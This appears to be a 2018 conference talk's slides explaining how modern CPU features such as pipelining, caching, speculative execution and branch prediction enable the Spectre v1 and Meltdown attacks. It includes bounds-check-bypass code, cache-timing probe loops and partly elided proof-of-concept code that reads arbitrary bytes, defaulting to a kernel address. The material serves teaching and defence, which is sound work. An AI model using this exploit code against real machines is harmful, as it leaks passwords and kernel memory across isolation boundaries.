Andriy Berestovskyy
2018
The Spectre of Meltdowns
(c) Andriy Berestovskyy
semihalf
berestovskyy
The Spectre of Meltdowns
● Evolution of CPUs
● Spectre v1 Attack
● Security Holy Grail
● Meltdown v3 Attack
● Fixes
● Spectre-Based Meltdown PoC
CPU?
Central Processing Unit (CPU) — electronic
circuitry that performs basic arithmetic,
logical, control and input/output operations
specified by the instructions.
— Wikipedia
3
Basic means
simple, right?
Modern CPU Die
[Figure: CPU die photo, about 2 billion transistors]
Source: Kaby Lake, https://newsroom.intel.com/press-kits/8th-gen-intel-core/
Why is it so complicated?
How does it work?
CPU Basic Operation Cycle*
Start
1. Fetch Instruction at PC
2. Decode Instruction
3. Load Data From Memory
4. Execute Instruction
5. Write Data to Memory
6. Update Registers and PC
* Instruction Cycle
Hardware implementation?
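The cycle above can be sketched in software as a tiny interpreter loop. This is only an illustration: the three-instruction ISA, `struct insn`, `struct cpu` and `toy_cpu_run()` are all made up for this sketch and do not correspond to any real CPU.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical toy ISA, invented for this sketch only. */
enum opcode { OP_HALT = 0, OP_LOADI = 1, OP_ADD = 2 };

struct insn {
    uint8_t op;   /* one of enum opcode */
    uint8_t dst;  /* destination register, 0..3 */
    uint8_t src;  /* source register, 0..3 (used by OP_ADD) */
    int32_t imm;  /* immediate value (used by OP_LOADI) */
};

struct cpu {
    size_t pc;        /* program counter: index of the next instruction */
    int32_t regs[4];  /* general-purpose registers */
};

/* Run until OP_HALT or the end of the program.
 * Returns the number of instructions fetched (HALT included). */
size_t toy_cpu_run(struct cpu *cpu, const struct insn *prog, size_t len)
{
    size_t executed = 0;

    assert(cpu != NULL);
    while (cpu->pc < len) {
        struct insn in = prog[cpu->pc];        /* fetch instruction at PC */
        executed++;
        switch (in.op) {                       /* decode */
        case OP_LOADI:                         /* execute, write register */
            cpu->regs[in.dst & 3] = in.imm;
            break;
        case OP_ADD:
            cpu->regs[in.dst & 3] += cpu->regs[in.src & 3];
            break;
        default:                               /* OP_HALT or unknown opcode */
            return executed;
        }
        cpu->pc++;                             /* update PC */
    }
    return executed;
}
```

Every instruction here finishes completely before the next one is fetched, which is the behaviour the following slides set out to improve.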
Simple CPU Implementation*
[Diagram: Memory, PC, Instruction Fetch/Decode, Registers, and ALU, grouped into four stages: Instruction Fetch, Decode/Load, Execute, Write]
* Simplified, just for an example
Performance?
Instructions Per Second (IPS) — measure of a
computer's processor speed.
— Wikipedia
7
MIPS?
FLOPS?
4MHz CPU Performance
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
[Diagram: each instruction passes through Fetch, Decode, Execute, Write before the next one starts: mov in cycles 1-4, xor in cycles 5-8, cmp from cycle 9]
4M cycles per second / 4 cycles per instruction = 1 MIPS
Solutions?
...one cycle per instruction?
More performance!
Instruction pipelining — process different parts of
instructions in parallel, i.e. an attempt to keep
every part of the CPU busy.
— Wikipedia
9
Let’s do it!
CPU with Pipeline*
[Diagram: Memory, PC, Registers, and ALU connected through blocks labelled Instruction Fetch/Decode, Instruction Decode/Execute, and Instruction Execute/Write; pipeline stages: Instruction Fetch, Decode/Load, Execute, Write]
* Intel i486 and newer
Performance?
Performance: Instruction Pipelining
[Diagram: basic pipeline over cycles 1-9; mov, xor, cmp, and div each enter Fetch one cycle after the previous instruction, so their Fetch, Decode, Execute, and Write stages overlap]
How many MIPS does a 4MHz CPU deliver now?
4MHz CPU with Pipeline
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
[Diagram: mov occupies cycles 1-4, xor cycles 2-5, cmp cycles 3-6; once the pipeline is full, one instruction completes every cycle]
4M cycles per second / 1 cycle per instruction = 4 MIPS
More performance!
...more MHz?
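The MIPS figures on these slides follow from simple cycle counting. A minimal sketch, assuming an ideal pipeline with no stalls; the function names are hypothetical and exist only for this example.

```c
#include <assert.h>
#include <stdint.h>

/* Cycles for n instructions when each one uses all stages before the next starts. */
uint64_t cycles_sequential(uint64_t n, uint64_t stages)
{
    assert(stages > 0);
    return n * stages;
}

/* Cycles for n instructions in an ideal pipeline:
 * the first instruction needs `stages` cycles, every later one adds one cycle. */
uint64_t cycles_pipelined(uint64_t n, uint64_t stages)
{
    assert(stages > 0);
    return n == 0 ? 0 : stages + n - 1;
}

/* Throughput in millions of instructions per second for a clock given in Hz. */
double mips(uint64_t clock_hz, uint64_t n, uint64_t cycles)
{
    if (cycles == 0)
        return 0.0;
    return (double)clock_hz * (double)n / (double)cycles / 1e6;
}
```

For the three instructions on the slide and four stages, the sequential CPU needs 12 cycles and the pipelined one 6. Over a long instruction stream at 4 MHz the first converges to 1 MIPS and the second to just under 4 MIPS.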
8MHz CPU with Pipeline
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
[Diagram: the same pipeline (F D E W) at twice the clock rate, cycles 1-17]
8M cycles per second / 1 cycle per instruction = 8 MIPS
More performance?
40MHz CPU Performance
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
40M cycles per second / 1 cycle per instruction = 40 MIPS?
Really?
Clock Speed Does Not Scale
40M cycles per second / 1 cycle per instruction = 40 MIPS
Source: https://en.wikipedia.org/wiki/Megahertz_myth
Why?
Memory Trends
[Chart: DRAM first-word latency over time]
Source: https://en.wikipedia.org/wiki/CAS_latency (First Word)
DRAM latency has stayed the same since the mid-'90s
More performance!
...but DRAM is slow...
Solutions?
Cache — faster memory, closer to a CPU, which
stores copies of frequently used main memory
locations.
— Wikipedia
17
Let’s do it!
CPU with Pipeline and Cache*
[Diagram: the pipelined CPU with an Instruction Cache, a Data Cache, and a Write Buffer added next to Memory; pipeline stages: Instruction Fetch, Decode/Load, Execute, Write]
* Intel i486 and newer
What's changed?
Performance?
CPU with Pipeline and Cache
[Diagram: mov, xor, cmp, div in the pipeline; a cache miss stalls the instructions behind it]
40M cycles per second / ~4 cycles per instruction = ~10 MIPS
Stalls :(
More performance!
...but the pipeline sometimes stalls...
Solution?
Superscalar CPU — executes more than one
instruction during a clock cycle using
different execution units.
— Wikipedia
20
Let’s do it!
Superscalar CPU Instruction Cycle*
Start
1. Fetch Two Instructions
2. Decode Two Instructions
3. Load Order: D1, D2
4. Execute Two Instructions
5. Write Order: D1, D2
6. Update Order: D1, D2
* Intel Pentium and newer
Why order?
Performance?
Superscalar CPU with Cache
[Diagram: mov, xor, cmp, div; a cache miss together with read ordering and write ordering stalls the following instructions]
40M CPS / ~4 CPI * 1.5 instructions per cycle = ~15 MIPS
Ordering :(
More performance!
...but stalls due to ordering...
Solutions?
Out-of-Order (dynamic) Execution — processor
executes instructions in order of input data and
execution units availability, not by their original
order in a program.
— Wikipedia
23
Let’s do it!
Out of Order CPU*
[Diagram: mov, xor, cmp, div; instructions behind a cache miss execute as soon as their input data and an execution unit are available]
* Intel Pentium Pro and newer
Improves the average instructions-per-cycle ratio
Why?
Read reordering :(
Write reordering :(
Re-order buffers on Intel CPUs
What about conditional jumps?
Conditional Jumps
uint8_t array[256];
size_t array_size = 256;
uint8_t bounds_check(size_t idx)
{
    if (idx < array_size)
        return array[idx];
    return 0;
}

bounds_check:
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
Full source: https://godbolt.org/g/Snb13E
mov or ret?
Performance?
OoO CPU vs Conditional Jumps
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
[Diagram: cmp waits on a cache miss; jbe depends on cmp, so the PC of the next instruction is not known yet: stall?]
More performance!
...but next instruction is unknown...
Solutions?
Speculative Execution —perform some tasks
that may not be needed.
— Wikipedia
27
Let’s do it!
CPU with Speculative Execution
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
[Diagram: cmp waits on a cache miss and jbe depends on cmp; mov* and ret* run speculatively, and mov* takes its own cache miss]
Continue with mov!
What if speculation is incorrect?
Branch Miss
[Diagram: the speculation on mov* and ret* turns out to be wrong; the correct ret is fetched after an icache miss, which adds a branch miss penalty]
Flush the pipeline!
More performance!
...but branch misses are very expensive...
Options?
Speculation Options
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
Either:
    ret
    ...
Or:
    mov array(%rdi), %eax
    ret
    ...
Options:
1. Execute left branch
2. Execute right branch
3. Execute both branches
4. Other?
Pros/cons?
Solution?
Branch Predictor — digital circuit that tries to
guess which way a branch will go
before this is known definitively.
— Wikipedia
31
How does it
work?
Branch Predictor
[Diagram: Branch History Table with 2^n elements, indexed by the last n bits of the instruction address (here the address of jbe); each element stores recent taken/not-taken outcomes (Y/N) and yields the prediction]
Source: https://en.wikipedia.org/wiki/Branch_predictor
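A table like this can be sketched in a few lines. Note the swap: instead of the per-entry Y/N history drawn on the slide, this sketch uses the common 2-bit saturating counter scheme. The table size and all names (`struct bht`, `bht_predict()`, `bht_update()`) are assumptions made for the example, not the design of any real CPU.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define BHT_BITS 4                 /* n: low address bits used as the index */
#define BHT_SIZE (1u << BHT_BITS)  /* 2^n table elements */

/* Each counter is 0..3: 0 and 1 predict "not taken", 2 and 3 predict "taken". */
struct bht {
    uint8_t counter[BHT_SIZE];
};

void bht_init(struct bht *t)
{
    assert(t != NULL);
    memset(t->counter, 0, sizeof(t->counter));
}

/* Index by the last n bits of the branch instruction address. */
static unsigned bht_index(uint64_t insn_addr)
{
    return (unsigned)(insn_addr & (BHT_SIZE - 1));
}

bool bht_predict(const struct bht *t, uint64_t insn_addr)
{
    return t->counter[bht_index(insn_addr)] >= 2;
}

/* Move the counter towards the real outcome once the branch resolves. */
void bht_update(struct bht *t, uint64_t insn_addr, bool taken)
{
    uint8_t *c = &t->counter[bht_index(insn_addr)];

    if (taken && *c < 3)
        (*c)++;
    else if (!taken && *c > 0)
        (*c)--;
}
```

Two properties matter for what follows. A branch that went the same way a few times in a row is predicted to go that way again. And two branches whose addresses share the same low n bits share one table element.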
Let’s do it!
CPU with Branch Predictor
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
[Diagram: Prediction: do not take branch; while cmp waits on a cache miss, mov* and ret* execute speculatively]
More performance!
...but there are no more ideas...
Solutions?
Multi-Core Processor — CPU with two or more
independent processing units called cores, which
read and execute program instructions.
— Wikipedia
34
How many
cores?
CPU Trends
[Chart: CPU trends over time]
Source: https://en.wikipedia.org/wiki/List_of_Intel_CPU_microarchitectures and https://en.wikipedia.org/wiki/Transistor_count
CPU clock limit?
72 cores * 4 = 288 threads
Summary?
CPU Performance Summary
+ Instruction Pipelines
+ Memory Cache
+ Superscalar Execution
+ Out of Order Execution
+ Speculative Execution
+ Branch Prediction
+ Multiple Cores
± CPU Clock (to a certain extent)
36
Modern CPU
Core?
Modern CPU Core
[Diagram: Skylake core]
Front end: 32K L1 Instruction Cache, Branch Prediction Unit, Legacy Decode Pipeline, Decoded Icache, MSROM, Instruction Decode Queue (micro-op queue)
Allocate/Rename/Retire/Move Elimination/Zero Idiom
Scheduler
Port 0: ALU, Vec ALU, Vec Shft, Vec Add, Vec Mul, FMA, DIV, Branch2
Port 1: ALU, Fast LEA, Vec ALU, Vec Shft, Vec Add, Vec Mul, FMA, Slow Int, Slow LEA
Port 5: ALU, Fast LEA, Vec ALU, Vec Shuff
Port 6: ALU, SHFT, Branch1
Port 2: LD/STA
Port 3: LD/STA
Port 4: STD
Port 7: STA
Memory: 32K L1 Data Cache, 256K L2 Cache
Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Modern CPU Die?
Modern CPU Die
[Diagram: six CPU cores (each with ALUs, caches, and a BPU), L3 Cache slices, System Agent, Memory Controller, Interconnect, GPU; about 2 billion transistors]
Source: https://newsroom.intel.com/press-kits/8th-gen-intel-core/
So, why is it so complicated?
Because we need performance!
So, what about Spectre et al?
All Your Secrets Belong to Us
uint8_t array[256 * 4096];
size_t array_size = 256;
uint8_t bounds_check(size_t idx)
{
    if (idx < array_size)
        return array[idx * 4096];
    return 0;
}

bounds_check:
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    sal $12, %rdi
    mov array(%rdi), %eax
.L1:
    ret
Full source: https://godbolt.org/g/Snb13E
Execution?
Why?
Bounds Check on Modern CPU
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    sal $12, %rdi
    mov array(%rdi), %eax
[Diagram: Prediction: do not take branch; cmp waits on a cache miss and jbe depends on cmp, while sal* and mov* execute speculatively; mov* takes its own cache miss]
What about cache?
Memory Prior Cache Misses
    cmp %rdi, array_size(%rip)
    jbe .L1
    sal $12, %rdi
    mov array(%rdi), %eax
[Diagram: virtual memory with array_size and array, legend: "cold" memory / cached memory; cmp takes a cache miss on array_size; Prediction: do not take branch; mov* speculatively reads array at offset array_size * 4096 and also misses the cache]
What will happen after execution?
Memory After Cache Misses
[Diagram: after both cache misses, array_size and the array element at array_size * 4096 are cached memory]
What if we missed the branch?
Memory After Branch Miss
    sal $12, %rdi
    mov array(%rdi), %eax
.L1:
    ret
[Diagram: the branch was mispredicted; the pipeline is flushed and the PC moves to ret, but the array element read by mov* stays cached]
Flush the pipeline!
Side effect!
How to detect cache side effect?
Observing Cache Side Effects*
uint8_t array[256 * 4096];
size_t array_size = 256;
...
for (i = 0; i < 256; i++) {
    start = rdtscp();
    tmp = array[i * 4096];
    cycles = rdtscp() - start;
    ...
}
* Simplification
[Diagram: virtual memory with array_size and array; the speculation side effect shows up as one cached element in the otherwise "cold" array]
How can we exploit these side effects?
Memory Before Indirect Read
size_t array_size = 16;
uint8_t side_effects[256 * 4096];
uint8_t base_array[16];
uint8_t bounds_check(uint64_t idx)
{
    if (idx < array_size) {
        uint8_t byte = base_array[idx];
        return side_effects[byte * 4096];
    }
    return 0;
}

bounds_check(unsigned long):
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov base_array(%rdi), %eax
    sal $12, %eax
    mov side_effects(%rax), %eax
.L1:
    rep ret
[Diagram: virtual memory with array_size, base_array, and side_effects; base_array holds precached data; byte = base_array[idx] selects side_effects[byte * 4096]; two accesses are marked "Cache miss!"]
Full source: https://github.com/berestovskyy/spectre-meltdown
Why?
After?
Memory After Indirect Read
[Same bounds_check() source and assembly as on the Memory Before Indirect Read slide]
[Diagram: virtual memory after the call; in addition to the precached base_array data, side_effects[byte * 4096] is now cached memory]
Full source: https://github.com/berestovskyy/spectre-meltdown
Pipeline?
Bounds Check Pipeline
bounds_check(unsigned long):
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov base_array(%rdi), %eax
    sal $12, %eax
    mov side_effects(%rax), %eax
[Diagram: Prediction: do not take branch; cmp waits for array_size and jbe depends on cmp; mov*, sal*, and mov* run speculatively]
Data is precached
Speculative read from side_effects
Can we reach outside the array?
Bounds Check Bypass
size_t array_size = 16;
uint8_t side_effects[256 * 4096];
uint8_t base_array[16];
uint8_t bounds_check(uint64_t idx)
{
    if (idx < array_size) {
        uint8_t secret = base_array[idx];
        return side_effects[secret * 4096];
    }
    return 0;
}

bounds_check(unsigned long):
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov base_array(%rdi), %eax
    sal $12, %eax
    mov side_effects(%rax), %eax
.L1:
    rep ret
[Diagram: virtual memory with array_size, base_array, a precached secret outside base_array, and side_effects; with idx = address of secret - address of base_array, secret = base_array[idx] reads the secret, and side_effects[secret * 4096] becomes cached]
Full source: https://github.com/berestovskyy/spectre-meltdown
Spectre?
Putting All Together: Spectre v1
1. Call bounds_check() a few times with a valid index
2. Flush array_size from the cache to force a cache miss
3. Call bounds_check() with an index pointing to the secret
4. Use the secret as an index into side_effects
5. Observe side_effects access times
Full source: https://github.com/berestovskyy/spectre-meltdown
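Step 5 boils down to finding the one probe line that loads noticeably faster than the rest. A minimal sketch, assuming the per-line access times have already been measured (for example with the rdtscp loop shown earlier). The name `find_cached_line()` is hypothetical, and the 2/3-of-average cutoff is an assumption borrowed from the heuristic in the PoC's read_any_byte().

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* cycles[i] is the measured access time of side_effects[i * 4096].
 * Returns the index of the fastest line if it is clearly faster than
 * average (below 2/3 of the mean), or -1 if no line stands out. */
int find_cached_line(const uint64_t *cycles, size_t n)
{
    uint64_t sum = 0;
    size_t best = 0;

    assert(cycles != NULL || n == 0);
    if (n == 0)
        return -1;
    for (size_t i = 0; i < n; i++) {
        sum += cycles[i];
        if (cycles[i] < cycles[best])
            best = i;
    }
    uint64_t avg = sum / n;
    return cycles[best] < avg * 2 / 3 ? (int)best : -1;
}
```

The returned index is the value of the byte that was read speculatively, since that byte selected which line of side_effects got cached. Real measurements are noisy, so an attack would repeat the whole sequence many times and keep the most frequent answer.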
Summary?
Spectre v1 Summary
1. Reason: cache side effects
2. The source code is valid, no (easy) fix in software
3. Cache side-channel might be fixed in the future
4. Reads any byte within current process memory
Is it even dangerous?
Spectre v1 Victims
1. eBPF
2. Java
3. JavaScript
   Online checker: https://xlab.tencent.com/special/spectre/
4. Other JIT engines
ouch!
Scenarios?
JavaScript Attack Scenario
[Sequence diagram: Web Browser and Web Server]
1. Browser: GET /
2. Server: OK index.html (browser parses index.html)
3. Browser: GET /spectre.js
4. Server: OK spectre.js (browser executes spectre.js)
5. Browser: HTTP POST secrets.json
Execution?
JavaScript Attack Execution
if (index < base_array.length) {
    secret = base_array[index | 0];
    secret = ((secret * 4096) | 0);
    tmp ^= side_effects[secret | 0] | 0;
}

JavaScript JIT:
    cmp r15, [rbp - 0xe0]
    jnc 0x24dd099bb870
    lea rsi, [r12 + rdx * 1]
    mov rsi, [rsi + r15 * 1]
    shl rsi, 12
    and rsi, 0x1ffffff
    mov rsi, [rsi + r8 * 1]
    xor rsi, rdi
    mov rdi, rsi
[Diagram: browser memory with base_array, its length, and side_effects inside the JIT sandbox, and browser passwords outside it; side_effects[secret * 4096] becomes cached]
Source: Spectre Attacks: Exploiting Speculative Execution, Paul Kocher et al
Meltdown?
Most important security feature?
55
Process isolation — hardware and software
technologies designed to protect each process
from other processes by disallowing
inter-process memory access.
— Wikipedia
56
Hardware?
In practice?
Virtual Memory — abstraction of the resources
that are actually available on a given machine.
Combination of hardware and software maps
Virtual Addresses into Physical Addresses.
— Wikipedia
57
How to map Virtual
to Physical?
Translation Lookaside Buffer (TLB) — stores recent
translations of virtual memory to physical memory,
i.e. address-translation cache. Part of CPU
memory-management unit (MMU).
— Wikipedia
58
Drawings!
Process Isolation
[Diagram: Process 1 (main(), array), Process 2 (main()), and Kernel (syscall(), data), each with its own 64 bit virtual address space, backed by Physical Memory and Swap]
Mapped by OS, translated using TLB.
Why?
How to communicate?
System Call — programmatic way to request a
service from the kernel. A syscall is a privilege level
switch, not a process context switch, i.e. a syscall is
processed in the user process context.
— Wikipedia
60
Why no process
context switch?
Skylake TLB Cache Hierarchy
Level               Page Size               Entries
Instruction         4KB                     128
Instruction         2MB/4MB                 8 per thread
First Level Data    4KB                     64
First Level Data    2MB/4MB                 32
First Level Data    1GB                     4
Second Level        Shared 4KB and 2/4MB    1536
Second Level        1GB                     16
Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Not that much :(
So, if no process context switch...
...how to access kernel data?
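Kernel Mapping
[Diagram: the Kernel (syscall(), data) is mapped into the virtual address space of Process 1 (main(), array1) and of Process 2 (main()), beginning at Start Kernel Map; SYSCALL leads to kernel data access; everything is backed by Physical Memory and Swap]
Bomba!
Now, how to protect kernel data?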
CPU Privilege Level — per-process operating mode
restrictions on type and scope of operations that
can be performed, i.e. OS to run with more
privileges than application software.
— Wikipedia
63
Privilege Level Switch
[Diagram: one 64 bit virtual address space holding the Process (main(), array1) and, from Start Kernel Map, the Kernel (syscall(), data), separated by a privilege level switch (SYSCALL)]
Kernel is able to access process data
Process is not able to access kernel data
Mega!
So, what is Meltdown?
Meltdown — hardware vulnerability, which allows
a rogue process to read all memory, even when it is
not authorized to do so.
— Wikipedia
65
Kernel is mapped to
each process...
Meltdown
[Diagram: the same 64 bit virtual address space: Process (main(), array1) and, from Start Kernel Map, Kernel (syscall(), data)]
Kernel is able to access process data
Process is able to read kernel data
Meltdown :(
Let's do it!
Recap: Bounds Check Bypass
[Same bounds_check() source, assembly, and memory diagram as on the Bounds Check Bypass slide: secret = base_array[idx] reads a precached secret, and side_effects[secret * 4096] becomes cached]
Full source: https://github.com/berestovskyy/spectre-meltdown
Can we exploit it to access kernel data?
Spectre v1 Attack to Kernel Data
[Same bounds_check() source and assembly; in the memory diagram the out-of-bounds index now points at precached kernel data instead of the process's own secret]
Full source: https://github.com/berestovskyy/spectre-meltdown
How?
Putting All Together: Meltdown v3
1. Find the address of a kernel structure (out of scope)
2. Invoke a system call to cache this structure
3. Do Spectre v1, but with a kernel address:
   a. Call bounds_check() a few times with a valid index
   b. Flush array_size from the cache to force a cache miss
   c. Call bounds_check() with an index pointing to the kernel structure
   d. Use the secret as an index into side_effects
   e. Observe side_effects access times
Full source: https://github.com/berestovskyy/spectre-meltdown
Summary?
Meltdown v3 Summary
1. Reason 0: hardware bug (accessing memory and checking privileges in parallel)
2. Reason 1: cache side effects (i.e. Spectre)
3. Reason 2: kernel is mapped into every process, because a syscall is a privilege level switch, not a process context switch
4. Reads any mapped and cached byte
Is it even dangerous?
Meltdown Attack Scenario
[Sequence diagram: Web Browser and Web Server]
1. Browser: GET /
2. Server: OK index.html (browser parses index.html)
3. Browser: GET /meltdown.js
4. Server: OK meltdown.js (browser executes meltdown.js with valid syscalls)
5. Browser: HTTP POST kernel-data.json
How to fix?
Fixes: An Open Question
Spectre v1:
1. Speculation barrier
2. Other?
Meltdown v3:
1. Process context switch instead of privilege level switch
2. PCID/ASID
3. Other?
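Besides a speculation barrier (on x86, an `_mm_lfence()` right after the bounds check), one software option for Spectre v1 is to clamp the index with a mask computed without a branch, so that even a mispredicted path cannot read out of bounds. The sketch below is in the spirit of the Linux kernel's `array_index_nospec()`, but it is not that code: `index_mask()` and `bounds_check_masked()` are hypothetical names, and it assumes `size` is at most half of SIZE_MAX. Plain C gives no guarantee that the compiler keeps the mask; production code relies on inline assembly or compiler support for that.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>
#include <stdint.h>

size_t array_size = 16;
uint8_t base_array[16];

/* All ones if idx < size, zero otherwise, computed without a branch.
 * If idx >= size, then idx or (size - 1 - idx) has its top bit set. */
static inline size_t index_mask(size_t idx, size_t size)
{
    size_t top = (idx | (size - 1 - idx)) >> (sizeof(size_t) * CHAR_BIT - 1);

    return top - 1;  /* top == 0 gives all ones, top == 1 gives zero */
}

uint8_t bounds_check_masked(size_t idx)
{
    if (idx < array_size) {
        /* On a mispredicted path the mask is zero, so the load hits base_array[0]. */
        idx &= index_mask(idx, array_size);
        return base_array[idx];
    }
    return 0;
}
```

The architectural result is the same as for the original bounds_check(); the difference only matters during speculation, where an out-of-range idx is forced to 0 instead of reaching the secret.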
Spectre-Based Meltdown PoC
#define MIN_READS 100
#define MAX_READ_CYCLES 1000
#define BRANCH_TRAINS 6
#define BYTE_VALUES 256
#define PAGE_SIZE 4096
size_t array_size = BRANCH_TRAINS;
uint8_t side_effects[BYTE_VALUES * PAGE_SIZE] = {1};
uint8_t base_array[BRANCH_TRAINS];
uint8_t tmp;
char secret[] = "My password";
int fd;
uint8_t bounds_check(uint64_t idx)
{
if (idx < array_size)
return side_effects[base_array[idx] * PAGE_SIZE];
return 0;
}
uint8_t read_any_byte(uint64_t addr);
int main(int argc, char **argv)
{
uint8_t byte;
uint64_t addr = (uint64_t)&secret;
addr = argc < 2 ? 0xffffffff81800040ULL
: strtoull(argv[1], NULL, 0);
addr = addr != 0 ? addr : (uint64_t)&secret;
if ((fd = open("/proc/version", O_RDONLY)) < 0)
perror("Error opening /proc/version");
do {
byte = read_any_byte(addr);
printf("0x%" PRIx64 " = 0x%x ('%c')\n", addr++,
byte, byte);
} while (byte != 0);
return 0;
}
Full source: https://github.com/berestovskyy/spectre-meltdown
Meltdown
uint8_t read_any_byte(uint64_t addr)
{
size_t tries, i, sum = 0, cnt = 0, mins[BYTE_VALUES];
addr -= (uint64_t)&base_array;
for (i = 0; i < BYTE_VALUES; i++)
mins[i] = SIZE_MAX;
for (tries = 0; tries < MIN_READS * 5; tries++) {
char buf[PAGE_SIZE];
if (fd > 0 && pread(fd, &buf, sizeof(buf), 0) < 0)
perror("Error reading /proc/version");
...
}
return 0;
}
/* Fragments of read_any_byte(), shown separately on the slide */
for (i = 1; i <= BRANCH_TRAINS * 4; i++) {
_mm_clflush(&array_size);
sched_yield();
tmp = bounds_check(addr & (i % BRANCH_TRAINS - 1));
}
for (i = 1; i < BYTE_VALUES; i++) {
__sync_synchronize();
register uint64_t start_tsc = __rdtsc();
tmp = side_effects[i * PAGE_SIZE];
__sync_synchronize();
register uint64_t cycles = __rdtsc() - start_tsc;
_mm_clflush(&side_effects[i * PAGE_SIZE]);
if (cycles > MAX_READ_CYCLES)
break;
else if (cycles < mins[i])
mins[i] = cycles;
if (cnt > MIN_READS && mins[i] < sum / cnt * 2 / 3)
return i;
sum += cycles;
cnt++;
}
Read Any Byte()
Full source: https://github.com/berestovskyy/spectre-meltdown
Meltdown
References
1. Meltdown and Spectre
https://meltdownattack.com/
2. Spectre Attacks: Exploiting Speculative Execution by Paul Kocher et al
https://spectreattack.com/spectre.pdf
3. Meltdown by Moritz Lipp et al
https://meltdownattack.com/meltdown.pdf
4. ARM Developer. Vulnerability of Speculative Processors to Cache Timing Side-Channel Mechanism
https://developer.arm.com/support/security-update
5. Intel Software Developer Manuals
https://software.intel.com/en-us/articles/intel-sdm
6. Spectre-based Meltdown proof of concept in just 99 lines of code:
https://github.com/berestovskyy/spectre-meltdown

Más contenido relacionado

La actualidad más candente

DoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDKDoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDKMarian Marinov
 
AMD: Where Gaming Begins
AMD: Where Gaming BeginsAMD: Where Gaming Begins
AMD: Where Gaming BeginsAMD
 
from Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu Worksfrom Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu WorksZhen Wei
 
Programmation de systèmes embarqués : BeagleBone Black et Linux embarqué
Programmation de systèmes embarqués : BeagleBone Black et Linux embarquéProgrammation de systèmes embarqués : BeagleBone Black et Linux embarqué
Programmation de systèmes embarqués : BeagleBone Black et Linux embarquéECAM Brussels Engineering School
 
[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅NAVER D2
 
Velocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFVelocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFBrendan Gregg
 
Q4.11: ARM Architecture
Q4.11: ARM ArchitectureQ4.11: ARM Architecture
Q4.11: ARM ArchitectureLinaro
 
Yocto project and open embedded training
Yocto project and open embedded trainingYocto project and open embedded training
Yocto project and open embedded trainingH Ming
 
The Linux Kernel Scheduler (For Beginners) - SFO17-421
The Linux Kernel Scheduler (For Beginners) - SFO17-421The Linux Kernel Scheduler (For Beginners) - SFO17-421
The Linux Kernel Scheduler (For Beginners) - SFO17-421Linaro
 
Pic 16f877 ..
Pic 16f877 ..Pic 16f877 ..
Pic 16f877 ..sunprass
 
Simd programming introduction
Simd programming introductionSimd programming introduction
Simd programming introductionChamp Yen
 
BPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabBPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabTaeung Song
 
Arm système embarqué
Arm système embarquéArm système embarqué
Arm système embarquéHoussem Rouini
 
Intel core i7 processors
Intel core i7 processorsIntel core i7 processors
Intel core i7 processorsSelf employed
 
CPU Architectures for Mobile Phone Devices
CPU Architectures for Mobile Phone DevicesCPU Architectures for Mobile Phone Devices
CPU Architectures for Mobile Phone Devicessagar chansaulia
 
Programmation de systèmes embarqués : Systèmes temps réel et PRUSS
Programmation de systèmes embarqués : Systèmes temps réel et PRUSSProgrammation de systèmes embarqués : Systèmes temps réel et PRUSS
Programmation de systèmes embarqués : Systèmes temps réel et PRUSSECAM Brussels Engineering School
 

La actualidad más candente (20)

Memory model
Memory modelMemory model
Memory model
 
DoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDKDoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDK
 
AMD: Where Gaming Begins
AMD: Where Gaming BeginsAMD: Where Gaming Begins
AMD: Where Gaming Begins
 
Intel Core i7
Intel Core i7Intel Core i7
Intel Core i7
 
from Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu Worksfrom Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu Works
 
Intel Core i7 Processors
Intel Core i7 ProcessorsIntel Core i7 Processors
Intel Core i7 Processors
 
Programmation de systèmes embarqués : BeagleBone Black et Linux embarqué
Programmation de systèmes embarqués : BeagleBone Black et Linux embarquéProgrammation de systèmes embarqués : BeagleBone Black et Linux embarqué
Programmation de systèmes embarqués : BeagleBone Black et Linux embarqué
 
[232] 성능어디까지쥐어짜봤니 송태웅
